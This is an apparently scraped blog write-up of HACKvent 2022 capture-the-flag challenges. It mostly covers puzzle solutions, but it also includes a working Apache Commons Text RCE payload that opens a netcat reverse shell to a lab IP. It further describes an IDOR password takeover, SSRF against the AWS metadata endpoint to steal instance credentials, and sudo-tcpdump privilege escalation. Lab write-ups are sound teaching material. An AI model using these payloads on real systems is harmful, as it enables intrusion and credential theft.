![\"\"](\"https:\/\/sigterm.ch\/wp-content\/uploads\/2022\/12\/image-120.png\")
<\/a>Of course, this changed until the end of the competition, as other participants solved all the challenges in time. In the final ranking on the 31st of December 2022, I ended up in place #14.<\/p>\n\n\n\n Santa’s brother Father Musk just bought out a new decoration factory. He sacked all the developers and tried making his own QR code generator but something seems off with it. Can you try and see what he’s done wrong?<\/p>\n\n\n\n This challenge was provided to you by Deaths Pirate<\/strong>. Rumors say, he’s found the One Piece.<\/em><\/p>\n\n\n\n I solved this challenge manually on my mobile phone. I used an online service that extracted all frames from the GIF and then scanned the QR code from each frame. When I was writing this write-up, I wanted to present a nicer solution and wanted to write a simple bash script. But when writing the script, I came across the tool “zbarimg”, which interprets the GIF automatically, and no script is needed anymore\u2026<\/p>\n\n\n\n HV22{I_CaN_HaZ_Al_T3h_QRs_Plz}<\/p>\n\n\n\n Santa has always wanted to compose a song for his elves to cherish their hard work. Additionally, he set up a vault with a secret access code only he knows!<\/p>\n\n\n\n The elves say that Santa has always liked to hide secret messages in his work and they think that the vaults combination number may be hidden in the magnum opus of his.<\/p>\n\n\n\n What are you waiting for? Go on, help the elves!<\/p>\n\n\n\n Hint #1: Keep in mind that you are given a web service, not a play button for a song.<\/strong><\/p>\n\n\n\n Hint #2: As stated in the description, Santa’s vault accepts a number, not text.<\/strong><\/p>\n\n\n\n Download file: song.pdf<\/a><\/p>\n\n\n\n This challenge was written by kuyaya<\/strong>. TODO: <insert joke about myself here> \ud83d\ude09<\/em><\/p>\n\n\n\n A website is presented to us that only accepts numeric values. If we enter a wrong value, the website denies us the flag.<\/p>\n\n\n\n The PDF file, which we can download from the website, shows us some musical notes.<\/p>\n\n\n\n This challenge is straightforward. If we read the musical notes, we get the result “bae faced a bad deed”. This string looks like a hexadecimal number. We get the correct passcode if we convert the hexadecimal number to a decimal number (base 10). We can do this with Cyberchef<\/a>. HV22{13..s0me_numb3rs..37}<\/p>\n\n\n\n The elves found this Python script that Rudolph wrote for Santa, but it’s behaving very strangely. It shouldn’t even run at all, and yet it does! It’s like there’s some kind of ghost in the script! Can you figure out what’s going on and recover the flag?<\/p>\n\n\n\n Script: gh0st.py<\/a><\/p>\n\n\n\n This challenge was written by 0xdf<\/strong>. Luckily, he’s not a ghost yet<\/em><\/p>\n\n\n\n One first hurdle we must overcome is that this script contains null bytes. Many editors won’t be able to open the script because of the null bytes. If we edit the script directly in the shell with “vi” or “nano”, the null bytes do not interfere.<\/p>\n\n\n\n We can see that the script is xoring our submitted flag with the characters in the song. Our flag is looped through all chars. The character is xored with the value in the song at the position of the index multiplied by 10. After the xor operation, the result is compared with the values in the array “correct”. As we have all information and xor is reversible, we can add the following lines to the script to print out the correct flag:<\/p>\n\n\n\n The array “correct” is of length 30. This means we need to submit a pseudo flag with the same length to our modified script:<\/p>\n\n\n\n HV22{nUll_bytes_st0mp_cPy7h0n}<\/p>\n\n\n\n Santa, who is a passionate mathematician, has created a small website to train his animation coding skills. Although Santa lives in the north pole, where the degrees<\/strong> are very low, the website’s animation luckily did not freeze. It just seems to move very slooowww. But how does this help…? The elves think there might be a flag in the application…<\/p>\n\n\n\n This challenge was written by dr_nick<\/strong>. Sick animations!<\/em><\/p>\n\n\n\n This website is presented to us in the challenge.<\/p>\n\n\n\n The HTML code of the website looks like this:<\/p>\n\n\n\n According to the challenge description, there must be something with radians and degrees. Therefore, I converted the values of the array “rot” in the Javascript code from radians to degrees:<\/p>\n\n\n\n To solve the challenge, we needed to guess the next steps. After looking at the array for a long time, I saw the pattern. The flag always starts with “HV22{“; in decimal, this is “72 86 50 50 123”. If we divide all the degrees by two and add the last number to it, we get the decimal representation of the flag. This we can solve with a very simple python script:<\/p>\n\n\n\n HV22{C4lcul8_w1th_PI}<\/p>\n\n\n\n Like every year the elves were busy all year long making the best toys in Santas workshop. This year they tried some new fabrication technology. They had fun using their new machine, but it turns out that the last gift is missing.<\/p>\n\n\n\n Unfortunately, Alabaster who was in charge of making this gift is not around, because he had to go and fulfill his scout elf duty as an elf on the shelf.<\/p>\n\n\n\n But due to some very lucky circumstances the IT-guy elf was capturing the network traffic during this exact same time.<\/p>\n\n\n\n This challenge was written by wangibangi<\/strong>. Truly smart as a fox.<\/em><\/p>\n\n\n\n Goal:<\/strong><\/p>\n\n\n\n Can you help Santa and the elves to fabricate this toy and find the secret message?<\/p>\n\n\n\n Download PCAP file: tcpdump.pcap<\/a><\/p>\n\n\n\n The fast track to the solution looks like this (obviously, I lost some time browsing through the pcap file in Wireshark and looking for clues): Open Wireshark, File, Export Objects, HTTP, Save all. This exports multiple files of the HTTP traffic to our computer. When analyzing the files, we identify one file containing gcode data. Due to the export of Wireshark, it is called “local”, but by analyzing the traffic, we discover that the original file name is “hv22.gcode”. With the web service https:\/\/gcode.ws\/<\/a>, we can load the file and display its content, which reveals the flag.<\/p>\n\n\n\n HV22{this-is-a-w4ste-of-pl4stic}<\/p>\n\n\n\n S4nt4444…..s0m3wh3r3 1n th3 34sy ch4ll4ng3sss…..th3r3s 4n 34sy fl4g h1ddd3333nnnn…..sssshhhhh<\/em><\/p>\n\n\n\n There is no 24h bonus on the hidden challenges!<\/p>\n\n\n\n The hidden flag was placed inside the challenge of day 5. As there is a huge pcap file with a lot of data, I lost a lot of time trying to find the flag inside the network traffic. After some time, I focused on the big gcode file, which also provided the flag for day 5. Somewhere in the middle of the file hv22.gcode, there are five lines with comments:<\/p>\n\n\n\n I extracted all the numeric values and converted them from decimal to ASCII characters with CyberChef<\/a>.<\/p>\n\n\n\n HV22{h1dd3n-fl4g!}<\/p>\n\n\n\n As every good IT person, Santa doesn’t have all his backups at one place. Instead, he spread them all over the world. Can you recover the flag?<\/p>\n\n\n\n This challenge was written by HaCk0<\/strong>. HaCk0 if you’re reading this, can you send me some ether pleazze?<\/em><\/p>\n\n\n\n Start the Docker in the The source code of the contract is the following block of code:<\/p>\n\n\n\n As this was the first Blockchain challenge in HACKvent 2022, I spent a vast amount of time setting up all the dependencies like Metamask and Remix. After I did, I discovered that it was not needed for this challenge. HV22{Ch41nS_ar3_Publ1C}<\/p>\n\n\n\n Santa has found a weird device called an “Oxocard Blockly”, which seems to display a sequence of images. He believes it has got something to do with a QR code, but it doesn’t seem complete…<\/p>\n\n\n\n You can’t fly to the north pole, so Santa sent you a video of the device in action.<\/p>\n\n\n\n The elves are having a karaoke and left with in a hurry while singing into their micro. This means that they aren’t there to help him, so now is your chance to make a good impression and find the flag!<\/p>\n\n\n\n Resource<\/strong>: recording.mp4<\/a><\/p>\n\n\n\n This challenge was written by kuyaya<\/strong>. HACKvent + QR challenges = <3<\/em><\/p>\n\n\n\n If we look at the video, we can see a pattern. Four blocks are shown after each other in a new position: top left, top right, bottom left, and bottom right. Right after this, the video shows the top left part of a QR code (the square), followed by three more images. They need to be aligned like the pattern told us. I lost so much time because I assumed it was a normal QR code. Instead, we need to create a Micro QR Code. After finding out about the Micro QR Code, it was pretty straightforward. I used this web service to draw the QR code manually. https:\/\/www.pixilart.com\/draw<\/a><\/p>\n\n\n\n The next challenge was to find a scanner that supports Micro QR codes. I was faster adapting a Python script from Stackoverflow than finding a working scanner online.<\/p>\n\n\n\n HV22{b0f}<\/p>\n\n\n\n A user by the name of HACKventSanta<\/strong> may be spreading viruses. But Santa would never do that! The elves want you to find more information about this filthy impersonator.<\/p>\n\n\n\n This challenge was created by yuva<\/strong>. I swear he doesn’t write viruses!<\/em><\/p>\n\n\n\n Google didn’t return any results when searching for “HACKventSanta”. As we only have a username, I used the tool “Blackbird” to search for users on Social Networks. The tool returned one single result on Instagram.<\/p>\n\n\n\n From the Instagram profile, we get the link to the GitHub page<\/a>, which has one project, and we can download a file named “files.zip”. In the archive, there is only one index.html file with a message, but otherwise, nothing suspicious.<\/p>\n\n\n\n Based on the message in the HTML file, we look at the tags of the Git repository and can find three more files.<\/p>\n\n\n\n Both archives do not contain any new files. But the file “Undetected” is interesting. It is an ELF executable and includes the following strings.<\/p>\n\n\n\n We do as he says and upload the file “Undetected” to virustotal.com<\/a> which reveals a Twitter user.<\/p>\n\n\n\n On the Twitter profile<\/a>, we can see three posts whit QR codes. One contains the Youtube-Link, where we get rickrolled, the second includes a link to a Christmas song, and the third has a link to a Google Drive document<\/a>.<\/p>\n\n\n\n The Google Drive document asks for a password, where we can enter the key “ThisIsTheKeyToReceiveTheGiftFromSanta” we found in the “Undetected” file. The document is a PDF file that contains the base64 encoded flag<\/a>.<\/p>\n\n\n\n HV22{HOHO+SANTA+GIVES+FLAGS+NOT+VIRUS}<\/p>\n\n\n\n Santa recently created some Text with a \ud83d\udc1a, which is said to be vulnerable code. Santa has put this Text in his library, putting the library in danger. He doesn’t know yet that this could pose a risk to his server. Can you backdoor the server and find all of Santa’s secrets?<\/p>\n\n\n\n This challenge was written by yuva<\/strong>. Yuva, can you text Santa what Text he has?<\/em><\/p>\n\n\n\n The challenge entry point is this lovely little website. If we enter a text, it is “encrypted” with rot-13 and returned to the page. If we don’t enter anything, the default string “HV22santa” is returned and “encrypted” with rot-13.<\/p>\n\n\n\n I wrongly assumed this challenge was about a typical code injection vulnerability. I tried all possible injection payloads but wasn’t successful. <\/p>\n\n\n\n I re-read the challenge description and got a new clue: The challenge category is “Penetration Testing”. The information mentions a library, and what I only recognized while reading the description the second time: “Text” is always written with a capital “T”, and suddenly everything becomes clear. Just recently, a critical vulnerability in the library Apache Text led to remote code execution (RCE)<\/a>! With this information, we can solve the challenge in no time.<\/p>\n\n\n\n We first need to ensure that we have a VPN connection to the Hacking-lab network. Then we set up a Netcat listener to establish a reverse shell.<\/p>\n\n\n\n Now we can copy and paste the payload found in the vulnerability description and alter it to connect the reverse shell back to my workstation. We must remember that the payload must be “encrypted” by rot-13. Otherwise, of course, it will not work.<\/p>\n\n\n\n Payload:<\/strong><\/p>\n\n\n\n Rot13 Payload:<\/p>\n\n\n\n And we get a shell and find the file “FLAG.txt” in the server’s directory “\/SANTA\/”.<\/p>\n\n\n\n HV22{th!s_Text_5h\u20acLL_Com\u20ac5_\u20a3\u20b90M_SANTAA!!}<\/p>\n\n\n\n Santa brings you another free gift! We are happy to announce a free note taking webapp for everybody. No account name restriction, no filtering, no restrictions and the most important thing: no bugs! Because it cannot be hacked, Santa decided to name it Notme = Not me you can hack!<\/p>\n\n\n\n Or can you?<\/p>\n\n\n\n This challenge was written by HaCk0<\/strong>. A non-blockchain challenge, what a surprise!<\/em><\/p>\n\n\n\n I got “first blood”\ud83e\ude78for this challenge! But probably only because I found another, unintended way to solve it – which was easier than the original one. The intended solution was a blind & time-based SQL injection. We can register a user, create notes, list and read our notes and update the user’s password. I first started to look at the API requests with Burp. I created two users: “user1” and “user2”. We can see that they get the id 1 and 2. Both receive the role “user”, and the password is returned as an unsalted SHA256 string.<\/p>\n\n\n\n Initially, I thought that we need to elevate our user role. But I didn’t find a way. After tinkering with Burp, I found an IDOR vulnerability in the update password function, namely the “\/api\/user\/x” endpoint. I found out that I can change the password of user1 when logged in with user2 by changing the ID in the API endpoint.<\/p>\n\n\n\n I tried to change the password of the user with ID 0, but this user doesn’t exist. My next, very lucky, guess was “1337”, and I was successful. I changed “Santa’s” password and could log in.<\/p>\n\n\n\n Santa’s profile had just one note containing the flag.<\/p>\n\n\n\n Because of the text in the flag, I discovered that I didn’t solve it the intended way. I contacted the challenge author, HaCk0, on Discord and informed him about the new method. He forgot to check the user on this endpoint, and he implemented it correctly on all others. \ud83d\ude42 This can happen, and I was lucky to solve the challenge first. The challenge was still very great; thanks for the effort!<\/p>\n\n\n\n HV22{Sql1_is_An_0Ld_Cr4Ft}<\/p>\n\n\n\n Santa has been screenshotting NFTs all year. Now that the price has dropped, he has resorted to screenshotting websites. It’s impossible that this may pose a security risk, is it?<\/p>\n\n\n\n You can find Santa’s website here: https:\/\/hackvent.deathspirate.com<\/a><\/p>\n\n\n\n This challenge was written by Deaths Pirate<\/strong>. Unlike me, he doesn’t pirate NFTs! YaaRRRrrr!<\/em><\/p>\n\n\n\n Today’s challenge was about AWS security. I liked the content of the challenge a lot. Unfortunately, the challenge website went down many times. And even more frustrating was the initial version of the challenge, where one would need to manually write or correct character by character of a very long and randomized AWS token. This is a lot of manual work, cumbersome, and very error-prone. After many participants complained in the Discord chat, this part of the challenge was adapted and made easier.<\/p>\n\n\n\n When we open the challenge website, we see this page:<\/p>\n\n\n\n The challenge website clearly hints that this one is about AWS security. While playing with the website and analyzing traffic, I recognized the images being loaded from the AWS S3 bucket “hackvent2022”. If we browse to the URL of the bucket, we can identify that this is an open S3 Bucket<\/a> where we also can list files.<\/p>\n\n\n\n The next logical step is to open the “flag1.txt” file and find the first part of the flag.<\/p>\n\n\n\n Now we need to go hunting for the rest of the flag. As this website offers a screenshot service to make images of other websites, it is obvious that we have a Server Side Request Forgery (SSRF)<\/a> vulnerability. If there is an SSRF vulnerability on a resource running on AWS, we can talk to the AWS IP 169.254.169.254 and query information about the running service, in this case, an EC2 instance. We can start looking for information by screenshotting the URL http:\/\/169.254.169.254\/latest\/meta-data and its subpages.<\/p>\n\n\n\n Eventually, we find the access keys of the EC2 instance.<\/p>\n\n\n\n In the first version of the challenge, the access token had to be manually written to text, or an OCR software could help. Nevertheless, because the used font Arial has some hard-to-distinguish characters, much manual effort had to be put in. Fortunately, I wasn’t the only one complaining, and the challenge author added an easier path. The access credentials could now be copied from the source code.<\/p>\n\n\n\n With the credentials and the corresponding name “Hackvent-SecretReader-EC2-Role” we now have everything to connect with the “cli” to the AWS console and start digging. I assumed the second part of the flag must be stored in the SecretsManager.<\/p>\n\n\n\n We can use the credentials as follows:<\/p>\n\n\n\n Now we can use the AWS command line interface to read the secrets and get the second half of the flag.<\/p>\n\n\n\n In the “flag2description”, we get a hint that the medium hidden flag is also somewhere in this challenge. And that it has something to do with “tags”.<\/p>\n\n\n\n HV22{H0_h0_h0_H4v3_&_M3r2y-Xm45_Yarr222_<3_Pirate}<\/p>\n\n\n\n Uhm…hello? What are you doing here? I thought you were tasked with finding a hidden flag in one of the medium challenges??<\/p>\n\n\n\n There is no 24h bonus on the hidden challenges!<\/p>\n\n\n\n If we go to the UserGuide of AWS and read more about IP 169.254.169.254 and how to retrieve an instance’s metadata, we also discover how to get tag data. Namely through the URL “http:\/\/169.254.169.254\/latest\/meta-data\/tags\/instance\/Name”. <\/p>\n\n\n\n Let’s try this:<\/p>\n\n\n\n HV22{5G0ldRing5QuickGetThem2MtDoom}<\/p>\n\n\n\n Santa wrote his first small script, to track the open gifts on the wishlist. However the script stopped working a couple of days ago and Santa has been stuck debugging the script. His sysadmin seems to be a bit funny \ud83d\ude09<\/p>\n\n\n\n This challenge was written by wangibangi<\/strong>. We do a little trolling! Truly a funny challenge, enjoyed by everyone universally.<\/em><\/p>\n\n\n\n Can you find the secret flag on the box?<\/p>\n\n\n\n Start the resources in the I liked the challenge of this day very much – Linux privilege escalation. When connecting to the resource, we are in a Bash shell of a Linux system. There is a script that does not run, probably because there is no connection to the internet.<\/p>\n\n\n\n We start to examine the environment, and after some time, we find the first exciting clue: With the command “sudo”, we can elevate our privileges to read the log files with “less”, and we also can use “tcpdump” as root.<\/p>\n\n\n\n Sudo privileges for tcpdump is a known vector to gain root access on a Linux host. <\/a>We can start tcpdump with Sudo, which elevates the root rights. From there, we can execute a program or a script whit the root permissions.<\/p>\n\n\n\n I wanted to have permanent root privileges. Therefore I wrote a small C program that returns a bash shell and compiled it directly on the challenge host.<\/p>\n\n\n\n With a tiny bash script, which will be executed from the elevated tcpdump, we set the suid bit to the compiled C program. This will allow us to create a permanent root shell on the system.<\/p>\n\n\n\n HV22{M4k3-M3-a-S4ndW1ch}<\/p>\n\n\n\n After the previous fiasco with multiple bugs in Notme (some intended and some not), Santa released a now truly secure note taking app for you. Introducing: Noty, a fixed version of Notme.<\/p>\n\n\n\n Also Santa makes sure that this service runs on green energy. No pollution from this app \ud83d\ude09<\/p>\n\n\n\n This challenge was written by HaCk0<\/strong>. He’s a Challenge knight0!<\/em><\/p>\n\n\n\n I completely ran in the wrong direction in this challenge. I thought it would be again a vulnerability related to SQL injection or some logical flaws in the API. After carefully re-reading the description, I realized I was on the wrong path. There is a clear hint in the description: “No pollution from this app ;)”.<\/p>\n\n\n\n I know two kinds of pollution attacks: Parameter Pollution and Prototype Pollution. As we don’t have any parameters (all POST requests) in the application, we start digging into the Prototyp Pollution attack. I found an <\/a>[HV22.01] QR means quick reactions, right?<\/h1>\n\n\n\n
<\/figure>\n\n\n\nDescription<\/h2>\n\n\n\n
<\/a><\/figure>\n\n\n\nSolution<\/h2>\n\n\n\n
$ zbarimg 326b39e0-ccf5-4b94-88ff-e1b654e2c5b9.gif \nQR-Code:H\nQR-Code:V\nQR-Code:2\nQR-Code:2\nQR-Code:{\nQR-Code:I\nQR-Code:_\nQR-Code:C\nQR-Code:a\nQR-Code:N\nQR-Code:_\nQR-Code:H\nQR-Code:a\nQR-Code:Z\nQR-Code:_\nQR-Code:A\nQR-Code:l\nQR-Code:_\nQR-Code:T\nQR-Code:3\nQR-Code:h\nQR-Code:_\nQR-Code:Q\nQR-Code:R\nQR-Code:s\nQR-Code:_\nQR-Code:P\nQR-Code:l\nQR-Code:z\nQR-Code:}\nscanned 30 barcode symbols from 30 images in 0.28 seconds<\/pre>\n\n\n\nFlag<\/h2>\n\n\n\n
\n\n\n\n[HV22.02] Santa’s song<\/h1>\n\n\n\n
<\/figure>\n\n\n\nDescription<\/h2>\n\n\n\n
\n\n\n\nSolution<\/h2>\n\n\n\n
<\/a><\/figure>\n\n\n\n<\/a><\/figure>\n\n\n\n
When entering the correct passcode 13470175147275968237, the website reveals the flag:<\/p>\n\n\n\n<\/a><\/figure>\n\n\n\nFlag<\/h2>\n\n\n\n
\n\n\n\n[HV22.03] gh0st<\/h1>\n\n\n\n
<\/figure>\n\n\n\nDescription<\/h2>\n\n\n\n
Solution<\/h2>\n\n\n\n
#!\/usr\/bin\/env python3.7\n\nimport random\nimport sys\n\n\nif len(sys.argv) != 2:\n print(f'''usage: {sys.argv[0]} flag''')\n sys.exit()\n print('''Things are not what they seem?''')\n\n# only one in a million shall pass\nif random.randrange(1000000):\n sys.exit()\n\n# this isn't going to work\nprint(''')#%^$&*(#$%@^&*(#@!''')\nprint('''Nice job getting lucky there! But did you get the flag?''')\n\n# Santa only wants every third line!\nsong = \"\"\"You know Dasher, and Dancer, and\"\"\"\n#song += \"\"\"#Prancer, and Vixen,\"\"\"\n#song += \"\"\"#Comet, and Cupid, and\"\"\"\nsong += \"\"\"Donder and Blitzen\"\"\"\n#song += \"\"\"#But do you recall\"\"\"\n#song += \"\"\"#The most famous reindeer of all\"\"\"\nsong += \"\"\"Rudolph, the red-nosed reindeer\"\"\"\n#song += \"\"\"#had a very shiny nose\"\"\"\n#song += \"\"\"#and if you ever saw it\"\"\"\nsong += \"\"\"you would even say it glows.\"\"\"\n#song += \"\"\"#All of the other reindeer\"\"\"\n#song += \"\"\"#used to laugh and call him names\"\"\"\nsong += \"\"\"They never let poor Rudolph\"\"\"\n#song += \"\"\"#play in any reindeer games.\"\"\"\n#song += \"\"\"#Then one foggy Christmas eve\"\"\"\nsong += \"\"\"Santa came to say:\"\"\"\n#song += \"\"\" #Rudolph with your nose so bright,\"\"\"\n#song += \"\"\" #won't you guide my sleigh tonight?\"\"\"\nsong += \"\"\"Then all the reindeer loved him\"\"\"\n#song += \"\"\"#as they shouted out with glee,\"\"\"\n#song += \"\"\"#Rudolph the red-nosed reindeer,\"\"\"\nsong += \"\"\"you'll go down in history!\"\"\"\n\nflag = list(map(ord, sys.argv[1]))\ncorrect = [17, 55, 18, 92, 91, 10, 38, 8, 76, 127, 17, 12, 17, 2, 20, 49, 3, 4, 16, 8, 3, 58, 67, 60, 10, 66, 31, 95, 1, 93]\n\nfor i,c in enumerate(flag):\n flag[i] ^= ord(song[i*10 % len(song)])\n\nif all([c == f for c,f in zip(correct, flag)]):\n print('''Congrats!''')\nelse:\n print('''Try again!''')<\/pre>\n\n\n\ngetflag = \"\"\nfor i,c in enumerate(flag):\n flag[i] ^= ord(song[i*10 % len(song)])\n getflag += chr(correct[i]^ord(song[i*10 % len(song)]))\nprint(\"[+] Flag:\")\nprint(getflag)\nprint(\"------------------------\")<\/pre>\n\n\n\n
$ python3 gh0st.py `python3 -c \"print('A'*30)\"`\nNice job getting lucky there! But did you get the flag?\n[+] Flag:\nHV22{nUll_bytes_st0mp_cPy7h0n}\n------------------------\n<\/pre>\n\n\n\nFlag<\/h2>\n\n\n\n
\n\n\n\n[HV22.04] Santas radians<\/h1>\n\n\n\n
<\/figure>\n\n\n\nDescription<\/h2>\n\n\n\n
Solution<\/h2>\n\n\n\n
<\/a><\/figure>\n\n\n\n...\n<script>\n const canvas = document.getElementById(\"canvasPiCode\");\n const context = canvas.getContext(\"2d\");\n let clientX = 0;\n\n canvas.addEventListener('mousemove', e => {\n clientX = e.clientX*7\/1000;\n });\n\n let rot = [2.5132741228718345, 0.4886921905584123, -1.2566370614359172, 0, 2.548180707911721, -1.9547687622336491, -0.5235987755982988, 1.9547687622336491, -0.3141592653589793, 0.6283185307179586, -0.3141592653589793, -1.8151424220741028, 1.361356816555577, 0.8377580409572781, -2.443460952792061, 2.3387411976724013, -0.41887902047863906, -0.3141592653589793, -0.5235987755982988, -0.24434609527920614, 1.8151424220741028];\n let size = canvas.width \/ (rot.length+2);\n\n context.strokeStyle = \"black\";\n context.lineWidth = size*5\/16;\n context.shadowOffsetX = size\/4;\n context.shadowOffsetY = size\/4;\n context.shadowColor = \"gray\";\n context.shadowBlur = size\/4;\n\n let animCount = 0;\n\n function anim() {\n context.clearRect(0,0,canvas.width,canvas.height);\n for (let i = 0; i < rot.length; i++) {\n context.beginPath();\n context.arc((i + 1) * size, canvas.height \/ 2, size * 2 \/ 7, rot[i]+animCount+clientX, rot[i] + 5 +animCount+clientX);\n context.stroke();\n }\n animCount+=0.001;\n requestAnimationFrame(anim);\n }\n anim();\n\n<\/script>\n\n...<\/pre>\n\n\n\n[144, 28, -72, 0, 146, -112, -30, 112, -18, 36, -18, -104, 78, 48, -140, 134, -24, -18, -30, -14, 104]<\/pre>\n\n\n\n
degrees = [144, 28, -72, 0, 146, -112, -30, 112, -18, 36, -18, -104, 78, 48, -140, 134, -24, -18, -30, -14, 104]\ndivided = [x \/ 2 for x in degrees]\n\nflag = \"\"\nn = 0\nfor c in divided:\n\tc += n\n\tn = c\n\tflag += chr(int(c))\n\nprint(flag)<\/pre>\n\n\n\n
$ python3 sol.py \nHV22{C4lcul8_w1th_PI}<\/pre>\n\n\n\nFlag<\/h2>\n\n\n\n
\n\n\n\n[HV22.05] Missing gift<\/h1>\n\n\n\n
<\/figure>\n\n\n\nDescription<\/h2>\n\n\n\n
Solution<\/h2>\n\n\n\n
<\/a><\/figure>\n\n\n\nFlag<\/h2>\n\n\n\n
\n\n\n\n[HV22.H1] Santa’s Secret<\/h1>\n\n\n\n
<\/figure>\n\n\n\nDescription<\/h2>\n\n\n\n
Solution<\/h2>\n\n\n\n
;G1 X34.st3r E36 ;)\n;G1 X72.86 Y50.50 E123.104\n;G1 X49.100 Y100.51 E110.45\n;G1 X102.108 Y52.103 E33,125<\/pre>\n\n\n\n
Flag<\/h2>\n\n\n\n
\n\n\n\n[HV22.06] privacy isn’t given<\/h1>\n\n\n\n
<\/figure>\n\n\n\nDescription<\/h2>\n\n\n\n
With this new blockchain unstoppable technology emerging (except Solana, this chain stops all the time) he tries to use it as another backup space. To test the feasibility, he only uploaded one single flag. Fortunately for you, he doesn’t understand how blockchains work.<\/p>\n\n\n\n
\n\n\n\nInformation<\/h2>\n\n\n\n
Resources<\/code> section. You will be able to connect to a newly created Blockchain. Use the following information to interact with the challenge.<\/p>\n\n\n\nWallet public key
0x28a8746e75304c0780e011bed21c72cd78cd535e<\/code>\nWallet private key 0xa453611d9419d0e56f499079478fd72c37b251a94bfde4d19872c44cf65386e3<\/code>\nContract address: 0xe78A0F7E598Cc8b0Bb87894B0F60dD2a88d6a8Ab<\/code><\/pre>\n\n\n\n\/\/ SPDX-License-Identifier: UNLICENSED\npragma solidity ^0.8.9;\n\ncontract NotSoPrivate {\n address private owner;\n string private flag;\n\n constructor(string memory _flag) {\n flag = _flag;\n owner = msg.sender;\n }\n\n modifier onlyOwner() {\n require(msg.sender == owner);\n _;\n }\n\n function setFlag(string calldata _flag) external onlyOwner {\n flag = _flag;\n }\n}<\/pre>\n\n\n\nSolution<\/h2>\n\n\n\n
Data stored on the Blockchain is public, even when a variable has a private state. These variables are not available for other contracts but can be enumerated using Web3. This is because variables on the EVM (Ethereum Virtual Machine) are stored in order in an array. Through Web3, we can directly reference this array and get the corresponding values. You can find more information about this problem here: https:\/\/cryptomarketpool.com\/access-private-data-on-the-eth-blockchain\/<\/a>
I solved this challenge with the Web3.py Python library<\/a>. <\/p>\n\n\n\nfrom web3 import Web3, HTTPProvider\n\nw3 = Web3(HTTPProvider('http:\/\/152.96.7.10:8545'))\nprint(w3.eth.getStorageAt('0xe78A0F7E598Cc8b0Bb87894B0F60dD2a88d6a8Ab', 1))<\/pre>\n\n\n\n$ python3 sol.py \nb'HV22{Ch41nS_ar3_Publ1C}\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00.'<\/pre>\n\n\n\nFlag<\/h2>\n\n\n\n
\n\n\n\n[HV22.07] St. Nicholas’s animation<\/h1>\n\n\n\n
<\/figure>\n\n\n\nDescription<\/h2>\n\n\n\n
Solution<\/h2>\n\n\n\n
<\/a><\/figure>\n\n\n\nimport numpy as np\nimport pyboof as pb\n\ndata_path = \"qr.png\"\ndetector = pb.FactoryFiducial(np.uint8).microqr()\nimage = pb.load_single_band(data_path, np.uint8)\ndetector.detect(image)\n\nprint(\"Detected a total of {} QR Codes\".format(len(detector.detections)))\nfor qr in detector.detections:\n print(\"Message: \" + qr.message)\n print(\" at: \" + str(qr.bounds))<\/pre>\n\n\n\n$ python3 sol.py \nLaunching Java process: java_port=25333 python_port=25334\nGateway Server Started\nDetected a total of 1 QR Codes\nMessage: HV22{b0f}\n at: Polygon2D( (123.0,89.0) (557.9999999999089,89.00000000003412) (557.9999999998532,523.9999999998881) (123.00000000000962,523.9999999999582) )<\/pre>\n\n\n\nFlag<\/h2>\n\n\n\n
\n\n\n\n[HV22.08] Santa’s Virus<\/h1>\n\n\n\n
<\/figure>\n\n\n\nDescription<\/h2>\n\n\n\n
<\/a><\/figure>\n\n\n\nSolution<\/h2>\n\n\n\n
<\/a><\/figure>\n\n\n\n<\/a><\/figure>\n\n\n\n<\/a><\/figure>\n\n\n\nI am innocent! \nI am not a hacker \nThis is not a virus \nI can only give you key which you might need: \n ThisIsTheKeyToReceiveTheGiftFromSanta \nBut Go ahead and check my md5, I swear I am undetected!<\/pre>\n\n\n\n
<\/a><\/figure>\n\n\n\n<\/a><\/figure>\n\n\n\n<\/a><\/figure>\n\n\n\nFlag<\/h2>\n\n\n\n
\n\n\n\n[HV22.09] Santa’s Text<\/h1>\n\n\n\n
<\/figure>\n\n\n\nDescription<\/h2>\n\n\n\n
Solution<\/h2>\n\n\n\n
<\/a><\/figure>\n\n\n\n<\/a><\/figure>\n\n\n\n$ nc -lnvp 1337\nListening on 0.0.0.0 1337<\/pre>\n\n\n\n
${script:javascript:java.lang.Runtime.getRuntime().exec('nc 10.13.0.154 1337 -e \/bin\/bash')}<\/pre>\n\n\n\n${fpevcg:wninfpevcg:wnin.ynat.Ehagvzr.trgEhagvzr().rkrp('ap 10.13.0.154 1337 -r \/ova\/onfu')}<\/pre>\n\n\n\n<\/a><\/figure>\n\n\n\n<\/a><\/figure>\n\n\n\nFlag<\/h2>\n\n\n\n
\n\n\n\n[HV22.10] Notme<\/h1>\n\n\n\n
<\/figure>\n\n\n\nDescription<\/h2>\n\n\n\n
Solution<\/h2>\n\n\n\n
When we start the challenge, the following website loads.<\/p>\n\n\n\n<\/a><\/figure>\n\n\n\n<\/a><\/figure>\n\n\n\n<\/a><\/figure>\n\n\n\n<\/a><\/figure>\n\n\n\nFlag<\/h2>\n\n\n\n
\n\n\n\n[HV22.11] Santa’s Screenshot Render Function<\/h1>\n\n\n\n
<\/figure>\n\n\n\nDescription<\/h2>\n\n\n\n
Solution<\/h2>\n\n\n\n
<\/a><\/figure>\n\n\n\n<\/a><\/figure>\n\n\n\n<\/a><\/figure>\n\n\n\n<\/a><\/figure>\n\n\n\n<\/a><\/figure>\n\n\n\n<\/a><\/figure>\n\n\n\nexport AWS_ACCESS_KEY_ID=<>\nexport AWS_SECRET_ACCESS_KEY=<>\nexport AWS_SESSION_TOKEN=<><\/pre>\n\n\n\n
<\/a><\/figure>\n\n\n\n<\/a><\/figure>\n\n\n\n{\n \"ARN\": \"arn:aws:secretsmanager:eu-west-2:839663496474:secret:flag2-UjomOM\",\n \"Name\": \"flag2\",\n \"VersionId\": \"8a498b78-e73f-4a97-a0c3-74f365d3aa0d\",\n \"SecretString\": \"{\\\"flag2description\\\":\\\"Oh Hai! Santa made us split the flag up, he gave this part to me and told me to put it somewhere safe, I figured this was the best place. The other half he gave to another Elf and told him the same thing, but that Elf told me he just threw it into a bucket! That doesn't sound safe at all!\\\",\\\"flag2\\\":\\\"M3r2y-Xm45_Yarr222_<3_Pirate}\\\",\\\"what_is_this\\\":\\\"Oh I forgot to mention I overheard some of the elves talking about making tags available ... maybe they mean gift tags?! Who knows ... maybe you can make something out of that ... or not :D \\\"}\",\n \"VersionStages\": [\n \"AWSCURRENT\"\n ],\n \"CreatedDate\": 1670706291.128\n}<\/pre>\n\n\n\nFlag<\/h2>\n\n\n\n
\n\n\n\n[HV22.H2] The Elves’s Secret<\/h1>\n\n\n\n
<\/figure>\n\n\n\nDescription<\/h2>\n\n\n\n
